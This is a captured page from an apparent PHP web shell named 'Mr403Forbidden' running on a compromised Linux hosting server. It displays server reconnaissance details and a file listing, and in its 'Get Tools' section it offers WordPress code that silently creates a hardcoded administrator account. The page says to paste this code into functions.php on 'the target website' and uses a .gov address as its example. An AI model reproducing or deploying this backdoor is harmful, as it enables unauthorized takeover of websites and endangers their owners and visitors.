./Mr403Forbidden

:/usr/include/ncurses/ [ s--------- ]

System: Linux myhosting.zubahost.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
Software: LiteSpeed
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 194.163.174.55
Your IP: 216.73.216.138
User: business1 (1088) | Group: business1 (1091)
Safe Mode: OFF
MYSQL: OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
mail

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = 'mr403forbidden@hotmail.com';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
curses.h file 2023-10-14 18:54 97.29 KB root/root s---------
cursesapp.h file 2023-10-14 18:54 6.62 KB root/root s---------
cursesf.h file 2023-10-14 18:54 27.2 KB root/root s---------
cursesm.h file 2023-10-14 18:54 19.22 KB root/root s---------
cursesp.h file 2023-10-14 18:54 8.4 KB root/root s---------
cursesw.h file 2023-10-14 18:54 48.55 KB root/root s---------
cursslk.h file 2023-10-14 18:54 7.13 KB root/root s---------
eti.h file 2023-10-14 18:54 2.82 KB root/root s---------
etip.h file 2023-10-14 18:54 9.47 KB root/root s---------
form.h file 2023-10-14 18:54 18.17 KB root/root s---------
menu.h file 2023-10-14 18:54 11.91 KB root/root s---------
nc_tparm.h file 2023-10-14 18:54 4.1 KB root/root s---------
ncurses.h file 2023-10-14 18:54 97.29 KB root/root s---------
ncurses_dll.h file 2023-10-14 18:54 4.18 KB root/root s---------
panel.h file 2023-10-14 18:54 4.03 KB root/root s---------
term.h file 2023-10-14 18:54 40.22 KB root/root s---------
term_entry.h file 2023-10-14 18:54 8.55 KB root/root s---------
termcap.h file 2023-10-14 18:54 3.39 KB root/root s---------
tic.h file 2023-10-14 18:54 13.32 KB root/root s---------
unctrl.h file 2023-10-14 18:54 3.03 KB root/root s---------

© ./Mr403Forbidden